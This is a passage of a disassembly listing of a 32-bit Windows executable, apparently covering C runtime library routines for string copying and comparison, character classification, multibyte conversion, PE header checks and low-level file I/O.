		mov	eax, [esi+20h]
		cmp	eax, off_424F58
		jz	short loc_40CD39
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD39:				; CODE XREF: sub_40CCC4+6Cj
		mov	esi, [esi+24h]
		cmp	esi, off_424F5C
		jz	short loc_40CD4B
		push	esi
		call	sub_403B91
		pop	ecx

loc_40CD4B:				; CODE XREF: sub_40CCC4+7j
					; sub_40CCC4+7Ej
		pop	esi
		retn
sub_40CCC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CD4D	proc near		; CODE XREF: sub_40A074+117p
					; sub_40A074+139p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	eax, ebx
		push	esi
		push	edi
		jz	short loc_40CD62
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_40CD7D

loc_40CD62:				; CODE XREF: sub_40CD4D+Bj
					; sub_40CD4D+3Aj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CD6C:				; CODE XREF: sub_40CD4D+69j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CDBA
; ---------------------------------------------------------------------------

loc_40CD7D:				; CODE XREF: sub_40CD4D+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_40CD89

loc_40CD85:				; CODE XREF: sub_40CD4D+48j
		mov	[eax], bl
		jmp	short loc_40CD62
; ---------------------------------------------------------------------------

loc_40CD89:				; CODE XREF: sub_40CD4D+36j
		mov	edx, eax

loc_40CD8B:				; CODE XREF: sub_40CD4D+44j
		cmp	[edx], bl
		jz	short loc_40CD93
		inc	edx
		dec	edi
		jnz	short loc_40CD8B

loc_40CD93:				; CODE XREF: sub_40CD4D+40j
		cmp	edi, ebx
		jz	short loc_40CD85

loc_40CD97:				; CODE XREF: sub_40CD4D+55j
		mov	cl, [esi]
		mov	[edx], cl
		inc	edx
		inc	esi
		cmp	cl, bl
		jz	short loc_40CDA4
		dec	edi
		jnz	short loc_40CD97

loc_40CDA4:				; CODE XREF: sub_40CD4D+52j
		cmp	edi, ebx
		jnz	short loc_40CDB8
		mov	[eax], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CD6C
; ---------------------------------------------------------------------------

loc_40CDB8:				; CODE XREF: sub_40CD4D+59j
		xor	eax, eax

loc_40CDBA:				; CODE XREF: sub_40CD4D+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40CD4D	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CDD4:				; CODE XREF: .text:0040CDE1j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CDE3
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CDD4
; ---------------------------------------------------------------------------

loc_40CDE3:				; CODE XREF: .text:0040CDD8j
		mov	esi, [ebp+8]
		or	ecx, 0FFFFFFFFh
		lea	ecx, [ecx+0]

loc_40CDEC:				; CODE XREF: .text:0040CDFCj
		add	ecx, 1
		mov	al, [esi]
		or	al, al
		jz	short loc_40CDFE
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CDEC

loc_40CDFE:				; CODE XREF: .text:0040CDF3j
		mov	eax, ecx
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CE06	proc near		; CODE XREF: sub_40A074+F1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	[ebp+arg_C], ebx
		push	edi
		jnz	short loc_40CE26
		cmp	esi, ebx
		jnz	short loc_40CE2A
		cmp	[ebp+arg_4], ebx
		jnz	short loc_40CE31

loc_40CE1F:				; CODE XREF: sub_40CE06+4Dj
					; sub_40CE06+8Cj
		xor	eax, eax

loc_40CE21:				; CODE XREF: sub_40CE06+44j
					; sub_40CE06+9Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40CE26:				; CODE XREF: sub_40CE06+Ej
		cmp	esi, ebx
		jz	short loc_40CE31

loc_40CE2A:				; CODE XREF: sub_40CE06+12j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		ja	short loc_40CE4C

loc_40CE31:				; CODE XREF: sub_40CE06+17j
					; sub_40CE06+22j ...
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CE3B:				; CODE XREF: sub_40CE06+B1j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CE21
; ---------------------------------------------------------------------------

loc_40CE4C:				; CODE XREF: sub_40CE06+29j
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CE55
		mov	[esi], bl
		jmp	short loc_40CE1F
; ---------------------------------------------------------------------------

loc_40CE55:				; CODE XREF: sub_40CE06+49j
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		jnz	short loc_40CE60
		mov	[esi], bl
		jmp	short loc_40CE31
; ---------------------------------------------------------------------------

loc_40CE60:				; CODE XREF: sub_40CE06+54j
		cmp	[ebp+arg_C], 0FFFFFFFFh
		mov	eax, esi
		jnz	short loc_40CE77

loc_40CE68:				; CODE XREF: sub_40CE06+6Dj
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CE90
		dec	edi
		jnz	short loc_40CE68
		jmp	short loc_40CE90
; ---------------------------------------------------------------------------

loc_40CE77:				; CODE XREF: sub_40CE06+60j
					; sub_40CE06+81j
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CE89
		dec	edi
		jz	short loc_40CE89
		dec	[ebp+arg_C]
		jnz	short loc_40CE77

loc_40CE89:				; CODE XREF: sub_40CE06+79j
					; sub_40CE06+7Cj
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CE90
		mov	[eax], bl

loc_40CE90:				; CODE XREF: sub_40CE06+6Aj
					; sub_40CE06+6Fj ...
		cmp	edi, ebx
		jnz	short loc_40CE1F
		cmp	[ebp+arg_C], 0FFFFFFFFh
		jnz	short loc_40CEA9
		mov	eax, [ebp+arg_4]
		push	50h
		mov	[esi+eax-1], bl
		pop	eax
		jmp	loc_40CE21
; ---------------------------------------------------------------------------

loc_40CEA9:				; CODE XREF: sub_40CE06+92j
		mov	[esi], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CE3B
sub_40CE06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CEB9	proc near		; CODE XREF: sub_40EF87+32p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		and	[ebp+var_4], 0
		push	ebx
		mov	ebx, [ebp+arg_8]
		test	ebx, ebx
		jnz	short loc_40CED0
		xor	eax, eax
		jmp	loc_40CF6A
; ---------------------------------------------------------------------------

loc_40CED0:				; CODE XREF: sub_40CEB9+Ej
		cmp	ebx, 4
		push	edi
		jb	short loc_40CF4B
		lea	edi, [ebx-4]
		test	edi, edi
		jbe	short loc_40CF4B
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]

loc_40CEE3:				; CODE XREF: sub_40CEB9+66j
		mov	dl, [eax]
		add	eax, 4
		add	ecx, 4
		test	dl, dl
		jz	short loc_40CF41
		cmp	dl, [ecx-4]
		jnz	short loc_40CF41
		mov	dl, [eax-3]
		test	dl, dl
		jz	short loc_40CF37
		cmp	dl, [ecx-3]
		jnz	short loc_40CF37
		mov	dl, [eax-2]
		test	dl, dl
		jz	short loc_40CF2D
		cmp	dl, [ecx-2]
		jnz	short loc_40CF2D
		mov	dl, [eax-1]
		test	dl, dl
		jz	short loc_40CF23
		cmp	dl, [ecx-1]
		jnz	short loc_40CF23
		add	[ebp+var_4], 4
		cmp	[ebp+var_4], edi
		jb	short loc_40CEE3
		jmp	short loc_40CF62
; ---------------------------------------------------------------------------

loc_40CF23:				; CODE XREF: sub_40CEB9+58j
					; sub_40CEB9+5Dj
		movzx	eax, byte ptr [eax-1]
		movzx	ecx, byte ptr [ecx-1]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF2D:				; CODE XREF: sub_40CEB9+4Cj
					; sub_40CEB9+51j
		movzx	eax, byte ptr [eax-2]
		movzx	ecx, byte ptr [ecx-2]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF37:				; CODE XREF: sub_40CEB9+40j
					; sub_40CEB9+45j
		movzx	eax, byte ptr [eax-3]
		movzx	ecx, byte ptr [ecx-3]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF41:				; CODE XREF: sub_40CEB9+34j
					; sub_40CEB9+39j
		movzx	eax, byte ptr [eax-4]
		movzx	ecx, byte ptr [ecx-4]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF4B:				; CODE XREF: sub_40CEB9+1Bj
					; sub_40CEB9+22j
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]
		jmp	short loc_40CF62
; ---------------------------------------------------------------------------

loc_40CF53:				; CODE XREF: sub_40CEB9+ACj
		mov	dl, [eax]
		test	dl, dl
		jz	short loc_40CF6D
		cmp	dl, [ecx]
		jnz	short loc_40CF6D
		inc	eax
		inc	ecx
		inc	[ebp+var_4]

loc_40CF62:				; CODE XREF: sub_40CEB9+68j
					; sub_40CEB9+98j
		cmp	[ebp+var_4], ebx
		jb	short loc_40CF53
		xor	eax, eax

loc_40CF69:				; CODE XREF: sub_40CEB9+BCj
		pop	edi

loc_40CF6A:				; CODE XREF: sub_40CEB9+12j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40CF6D:				; CODE XREF: sub_40CEB9+9Ej
					; sub_40CEB9+A2j
		movzx	eax, byte ptr [eax]
		movzx	ecx, byte ptr [ecx]

loc_40CF73:				; CODE XREF: sub_40CEB9+72j
					; sub_40CEB9+7Cj ...
		sub	eax, ecx
		jmp	short loc_40CF69
sub_40CEB9	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CF94:				; CODE XREF: .text:0040CFA1j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CFA3
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CF94
; ---------------------------------------------------------------------------

loc_40CFA3:				; CODE XREF: .text:0040CF98j
		mov	esi, [ebp+8]
		mov	edi, edi

loc_40CFA8:				; CODE XREF: .text:0040CFB5j
		mov	al, [esi]
		or	al, al
		jz	short loc_40CFBA
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CFA8
		lea	eax, [esi-1]

loc_40CFBA:				; CODE XREF: .text:0040CFACj
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CFC0	proc near		; CODE XREF: sub_405C1A+93p
					; sub_406F97+34Dp ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		movzx	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, 8000h
		cmp	[ebp+var_4], 0
		jz	short locret_40CFF4
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40CFF4:				; CODE XREF: sub_40CFC0+2Bj
		leave
		retn
sub_40CFC0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CFF6	proc near		; CODE XREF: sub_409427+6CBp
					; sub_409427+B85p ...

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_40CFC0
		pop	ecx
		pop	ecx
		retn
sub_40CFF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D004	proc near		; CODE XREF: sub_405C1A+32p
					; sub_40A9EB+81p ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_6		= byte ptr -6
var_4		= word ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_18]
		call	sub_402CAD
		mov	ebx, [ebp+arg_0]
		lea	eax, [ebx+1]
		cmp	eax, 100h
		ja	short loc_40D032
		mov	eax, [ebp+var_18]
		mov	eax, [eax+0C8h]
		movzx	eax, word ptr [eax+ebx*2]
		jmp	short loc_40D0A7
; ---------------------------------------------------------------------------

loc_40D032:				; CODE XREF: sub_40D004+1Dj
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40D063
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_8], al
		mov	[ebp+var_7], bl
		mov	[ebp+var_6], 0
		pop	ecx
		jmp	short loc_40D06D
; ---------------------------------------------------------------------------

loc_40D063:				; CODE XREF: sub_40D004+4Bj
		xor	ecx, ecx
		mov	[ebp+var_8], bl
		mov	[ebp+var_7], 0
		inc	ecx

loc_40D06D:				; CODE XREF: sub_40D004+5Dj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+14h]
		push	dword ptr [eax+4]
		lea	eax, [ebp+var_4]
		push	eax
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_18]
		push	1
		push	eax
		call	sub_40CAB4
		add	esp, 20h
		test	eax, eax
		jnz	short loc_40D0A3
		cmp	[ebp+var_C], al
		jz	short loc_40D09F
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40D09F:				; CODE XREF: sub_40D004+92j
		xor	eax, eax
		jmp	short loc_40D0B7
; ---------------------------------------------------------------------------

loc_40D0A3:				; CODE XREF: sub_40D004+8Dj
		movzx	eax, [ebp+var_4]

loc_40D0A7:				; CODE XREF: sub_40D004+2Cj
		and	eax, [ebp+arg_4]
		cmp	[ebp+var_C], 0
		jz	short loc_40D0B7
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40D0B7:				; CODE XREF: sub_40D004+9Dj
					; sub_40D004+AAj
		pop	ebx
		leave
		retn
sub_40D004	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D0BA	proc near		; CODE XREF: sub_4080D9+Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428F3C, eax
		retn
sub_40D0BA	endp

; ---------------------------------------------------------------------------

loc_40D0C4:				; DATA XREF: sub_40D0D4:loc_40D139o
		push	dword ptr [esp+4]
		call	ds:off_41E11C
		xor	eax, eax
		inc	eax
		retn	8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D0D4	proc near		; CODE XREF: sub_405E41+26p
					; sub_405EF4+78p ...

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	14h
		push	offset dword_422CB0
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	dword_428F3C
		call	sub_405753
		pop	ecx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40D14A
		lea	eax, [ebp+var_1C]
		push	eax
		call	sub_407EC6
		pop	ecx
		cmp	eax, edi
		jz	short loc_40D112
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4033CB
		add	esp, 14h

loc_40D112:				; CODE XREF: sub_40D0D4+2Fj
		cmp	[ebp+var_1C], 1
		jz	short loc_40D139
		push	offset aKernel32_dl_10 ; "kernel32.dll"
		call	ds:dword_41E0E0	; GetModuleHandleA
		cmp	eax, edi
		jz	short loc_40D139
		push	offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
		push	eax
		call	ds:off_41E0E8
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40D13E

loc_40D139:				; CODE XREF: sub_40D0D4+42j
					; sub_40D0D4+51j
		mov	esi, offset loc_40D0C4

loc_40D13E:				; CODE XREF: sub_40D0D4+63j
		push	esi
		call	sub_4056E7
		pop	ecx
		mov	dword_428F3C, eax

loc_40D14A:				; CODE XREF: sub_40D0D4+21j
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; MultiByteToWideChar
		mov	[ebp+var_20], eax
		jmp	short loc_40D189
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		mov	[ebp+var_24], eax
		xor	ecx, ecx
		cmp	eax, 0C0000017h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		cmp	[ebp+var_24], 0C0000017h
		jnz	short loc_40D185
		push	8
		call	ds:dword_41E170	; RtlRestoreLastWin32Error

loc_40D185:				; CODE XREF: sub_40D0D4+A7j
		and	[ebp+var_20], 0

loc_40D189:				; CODE XREF: sub_40D0D4+84j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
sub_40D0D4	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40D1A0	proc near		; CODE XREF: sub_40D212+16p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		cmp	word ptr [ecx],	5A4Dh
		jz	short loc_40D1AE

loc_40D1AB:				; CODE XREF: sub_40D1A0+19j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40D1AE:				; CODE XREF: sub_40D1A0+9j
		mov	eax, [ecx+3Ch]
		add	eax, ecx
		cmp	dword ptr [eax], 4550h
		jnz	short loc_40D1AB
		xor	ecx, ecx
		cmp	word ptr [eax+18h], 10Bh
		setz	cl
		mov	eax, ecx
		retn
sub_40D1A0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40D1D0	proc near		; CODE XREF: sub_40D212+27p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		mov	ecx, [eax+3Ch]
		add	ecx, eax
		movzx	eax, word ptr [ecx+14h]
		push	ebx
		push	esi
		movzx	esi, word ptr [ecx+6]
		xor	edx, edx
		test	esi, esi
		push	edi
		lea	eax, [eax+ecx+18h]
		jbe	short loc_40D20C
		mov	edi, [esp+0Ch+arg_4]

loc_40D1F2:				; CODE XREF: sub_40D1D0+3Aj
		mov	ecx, [eax+0Ch]
		cmp	edi, ecx
		jb	short loc_40D202
		mov	ebx, [eax+8]
		add	ebx, ecx
		cmp	edi, ebx
		jb	short loc_40D20E

loc_40D202:				; CODE XREF: sub_40D1D0+27j
		add	edx, 1
		add	eax, 28h
		cmp	edx, esi
		jb	short loc_40D1F2

loc_40D20C:				; CODE XREF: sub_40D1D0+1Cj
		xor	eax, eax

loc_40D20E:				; CODE XREF: sub_40D1D0+30j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40D1D0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D212	proc near		; CODE XREF: sub_406C00+FFp
					; sub_407F39+Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422CD0
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		mov	edx, 400000h
		push	edx
		call	sub_40D1A0
		pop	ecx
		test	eax, eax
		jz	short loc_40D26F
		mov	eax, [ebp+arg_0]
		sub	eax, edx
		push	eax
		push	edx
		call	sub_40D1D0
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40D26F
		mov	eax, [eax+24h]
		shr	eax, 1Fh
		not	eax
		and	eax, 1
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_40D278
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		xor	ecx, ecx
		cmp	eax, 0C0000005h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40D26F:				; CODE XREF: sub_40D212+1Ej
					; sub_40D212+30j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		xor	eax, eax

loc_40D278:				; CODE XREF: sub_40D212+44j
		call	__SEH_epilog4
		retn
sub_40D212	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D27E	proc near		; CODE XREF: sub_40A36D+2EEp
					; sub_40A36D+3C8p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_8]
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		call	sub_40F33D
		or	edi, 0FFFFFFFFh
		cmp	eax, edi
		pop	ecx
		jnz	short loc_40D2B3
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40D2AD:				; CODE XREF: sub_40D27E+5Ej
		mov	eax, edi
		mov	edx, edi
		jmp	short loc_40D2FD
; ---------------------------------------------------------------------------

loc_40D2B3:				; CODE XREF: sub_40D27E+22j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_4]
		push	ecx
		push	[ebp+var_8]
		push	eax
		call	ds:off_41E074
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40D2DE
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jz	short loc_40D2DE
		push	eax
		call	sub_405DB9
		pop	ecx
		jmp	short loc_40D2AD
; ---------------------------------------------------------------------------

loc_40D2DE:				; CODE XREF: sub_40D27E+4Bj
					; sub_40D27E+55j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, [ebp+var_8]
		mov	edx, [ebp+var_4]

loc_40D2FD:				; CODE XREF: sub_40D27E+33j
		pop	edi
		pop	esi
		leave
		retn
sub_40D27E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D301	proc near		; CODE XREF: sub_406D96+116p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	14h
		push	offset dword_422CF0
		call	__SEH_prolog4
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_24], esi
		mov	[ebp+var_20], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40D33A
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40D331:				; CODE XREF: sub_40D301+66j
		mov	eax, esi
		mov	edx, esi
		jmp	loc_40D40A
; ---------------------------------------------------------------------------

loc_40D33A:				; CODE XREF: sub_40D301+1Bj
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40D348
		cmp	eax, dword_437EA4
		jb	short loc_40D369

loc_40D348:				; CODE XREF: sub_40D301+3Dj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40D331
; ---------------------------------------------------------------------------

loc_40D369:				; CODE XREF: sub_40D301+45j
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437EC0h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jnz	short loc_40D3AF
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	edx, 0FFFFFFFFh
		mov	eax, edx
		jmp	short loc_40D40A
; ---------------------------------------------------------------------------

loc_40D3AF:				; CODE XREF: sub_40D301+86j
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40D3DE
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		mov	[ebp+var_24], eax
		mov	[ebp+var_20], edx
		jmp	short loc_40D3F8
; ---------------------------------------------------------------------------

loc_40D3DE:				; CODE XREF: sub_40D301+BFj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_24], 0FFFFFFFFh
		or	[ebp+var_20], 0FFFFFFFFh

loc_40D3F8:				; CODE XREF: sub_40D301+DBj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40D410
		mov	eax, [ebp+var_24]
		mov	edx, [ebp+var_20]

loc_40D40A:				; CODE XREF: sub_40D301+34j
					; sub_40D301+ACj
		call	__SEH_epilog4
		retn
sub_40D301	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D410	proc near		; CODE XREF: sub_40D301+FEp
					; DATA XREF: zcrshv4o:00422D08o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40D410	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=518h


sub_40D41A	proc near		; CODE XREF: sub_40D9E0+9Ap
					; sub_410B67+BBp

var_594		= dword	ptr -594h
var_590		= dword	ptr -590h
var_58C		= dword	ptr -58Ch
var_588		= dword	ptr -588h
var_584		= dword	ptr -584h
var_580		= dword	ptr -580h
var_57C		= dword	ptr -57Ch
var_578		= dword	ptr -578h
var_574		= dword	ptr -574h
var_56D		= byte ptr -56Dh
var_56C		= dword	ptr -56Ch
var_568		= dword	ptr -568h
var_564		= byte ptr -564h
var_410		= byte ptr -410h
var_160		= byte ptr -160h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		lea	ebp, [esp-518h]
		sub	esp, 594h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+518h+var_4], eax
		mov	eax, [ebp+518h+arg_4]
		push	esi
		xor	esi, esi
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_57C], eax
		mov	[ebp+518h+var_578], esi
		mov	[ebp+518h+var_580], esi
		jnz	short loc_40D456
		xor	eax, eax
		jmp	loc_40D9CA
; ---------------------------------------------------------------------------

loc_40D456:				; CODE XREF: sub_40D41A+33j
		cmp	eax, esi
		jnz	short loc_40D481
		call	sub_405DA6
		mov	[eax], esi
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40D9CA
; ---------------------------------------------------------------------------

loc_40D481:				; CODE XREF: sub_40D41A+3Ej
		mov	esi, [ebp+518h+arg_0]
		push	ebx
		mov	ebx, esi
		and	ebx, 1Fh
		imul	ebx, 28h
		mov	eax, esi
		sar	eax, 5
		push	edi
		lea	edi, ds:437EC0h[eax*4]
		mov	eax, [edi]
		add	eax, ebx
		mov	cl, [eax+24h]
		add	cl, cl
		sar	cl, 1
		cmp	cl, 2
		mov	[ebp+518h+var_588], edi
		mov	[ebp+518h+var_56D], cl
		jz	short loc_40D4B8
		cmp	cl, 1
		jnz	short loc_40D4EB

loc_40D4B8:				; CODE XREF: sub_40D41A+97j
		mov	ecx, [ebp+518h+arg_8]
		not	ecx
		test	cl, 1
		jnz	short loc_40D4EB
		call	sub_405DA6
		xor	esi, esi
		mov	[eax], esi
